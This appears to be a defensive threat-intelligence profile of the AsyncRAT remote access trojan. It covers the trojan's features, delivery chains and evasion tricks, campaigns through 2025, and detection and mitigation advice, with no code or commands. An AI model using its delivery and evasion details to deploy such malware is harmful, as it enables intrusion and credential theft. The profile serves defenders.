Overview
AsyncRAT is an open-source remote access trojan written in C# and published on GitHub by its developer “NYAN-x-CAT” in early 2019. Originally presented as a legitimate remote administration tool, AsyncRAT has been extensively weaponized by cybercriminals and state-aligned threat actors. Its open-source nature allows anyone to compile custom builds, add plugins, and modify its behavior, which has led to a proliferation of variants in the wild. AsyncRAT consistently ranks among the most commonly observed RATs in enterprise threat telemetry. Its combination of a clean codebase, active community contributions, and comprehensive feature set has made it a go-to tool for attackers across the skill spectrum, from script kiddies to sophisticated APT groups conducting targeted espionage operations.
Capabilities
AsyncRAT provides full remote control over compromised Windows systems through an asynchronous communication model built on .NET’s async/await pattern, enabling efficient handling of multiple simultaneous connections. Core features include remote desktop viewing and control, keylogging, file manager with upload and download, process and service management, registry editor, shell command execution, and system information gathering. The RAT supports dynamic plugin loading, with community-developed modules adding capabilities such as cryptocurrency mining, browser credential harvesting, webcam streaming, audio recording, reverse proxy, and HVNC (Hidden Virtual Network Computing) for stealthy browser session manipulation. Communication is encrypted using TLS with certificate pinning, and the RAT includes anti-analysis features like sandbox detection and debugger checks.
Distribution Methods
AsyncRAT is delivered through diverse attack vectors owing to its open-source accessibility. Phishing emails remain the primary distribution method, with payloads embedded in Office documents, JavaScript files, or Windows shortcut (LNK) files. Threat actors frequently leverage multi-stage delivery chains involving PowerShell scripts, VBScript, and batch files that download the final payload from attacker-controlled infrastructure. ISO and IMG disk image files have been used to bypass Mark-of-the-Web protections. More advanced campaigns employ process injection, reflective DLL loading, and fileless execution techniques. AsyncRAT has also been distributed through compromised websites, fake software download pages, and malicious advertisements. SEO poisoning campaigns have targeted users searching for popular software, redirecting them to pages serving trojanized installers bundled with AsyncRAT.
Notable Campaigns
AsyncRAT has been used in numerous high-profile campaigns. In 2023, Microsoft and other vendors documented campaigns by North Korean threat actors using AsyncRAT in attacks against cryptocurrency firms. The Operation Jacana campaign in 2023 used AsyncRAT against governmental entities in Latin America. Throughout 2024, multiple APT groups incorporated AsyncRAT into their toolkits, attracted by its customizability and the difficulty of attributing open-source tools to specific actors. A large-scale campaign in late 2024 used AI-generated PowerShell scripts to deploy AsyncRAT through multi-layered obfuscation, demonstrating the evolving sophistication of its delivery mechanisms. In 2025, AsyncRAT variants with enhanced HVNC modules were observed targeting banking sector organizations for session hijacking.
Detection & Mitigation
Detecting AsyncRAT requires monitoring for its characteristic behaviors: outbound TLS connections to non-standard ports, scheduled task or registry run key persistence, and .NET process injection into legitimate Windows binaries. Network signatures can identify AsyncRAT’s handshake pattern and certificate characteristics. Endpoint detection should flag suspicious PowerShell download cradles, execution from user temporary directories, and attempts to disable Windows security features. YARA rules targeting AsyncRAT’s mutex patterns, configuration structures, and characteristic string artifacts are effective for identifying known variants. Mitigation includes restricting script execution through constrained language mode, implementing network segmentation, deploying EDR with behavioral analysis, blocking known AsyncRAT C2 infrastructure at the firewall level, and monitoring for anomalous scheduled task creation.